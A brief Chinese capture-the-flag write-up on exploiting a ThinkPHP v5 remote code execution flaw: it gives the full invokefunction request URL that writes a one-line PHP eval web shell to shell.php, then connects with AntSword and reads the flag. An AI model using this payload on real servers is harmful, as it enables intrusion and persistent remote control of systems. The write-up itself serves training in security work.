打开是thinkphp v5版本
根据版本号查询到有一个远程代码执行漏洞,查看权限
可以产看到PHPinfo
直接写一句话上传上去
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=shell.php&vars[1][1]=<?php eval($_REQUEST["a"]);?>
用蚁剑连接之后
在主目录下发现一个flag